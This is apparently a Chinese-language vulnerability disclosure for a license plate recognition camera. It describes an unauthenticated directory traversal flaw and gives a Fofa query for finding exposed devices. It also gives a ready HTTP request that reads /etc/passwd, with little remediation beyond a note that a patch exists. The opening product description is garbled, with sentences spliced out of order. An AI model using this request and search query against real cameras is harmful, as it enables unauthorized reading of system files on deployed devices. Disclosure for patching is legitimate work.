0x01 产品描述：

        DT-高清 车牌识别摄像机是一款先进的安防设备，采用高清图像传感器和先进的识别算法，能够精准、快速地识别车牌信息。其高清晰该摄像机结合了智能识别技术，支持实时监宴图像质量确保在各种光照和天气条件下都能准确捕捉车牌信息，而且具备远距离识别能力。测和记录车辆进出情况，适用于停车场管理、交通监控等场景，提高了安全性和管理效率。

0x02 漏洞描述：

        DT-高清车牌识别摄像机存在目录遍历致任意文件读取漏洞，未经身份验证的远程攻击者可以读取系统内部敏感配置文件,获取服务器信息，导致系统处于极不安全的状态。

0x03 搜索语句：

Fofa：app="DT-高清车牌识别摄像机"

0x04 漏洞复现：

GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

 

0x05 修复建议：

厂商已发布补丁 请及时修复。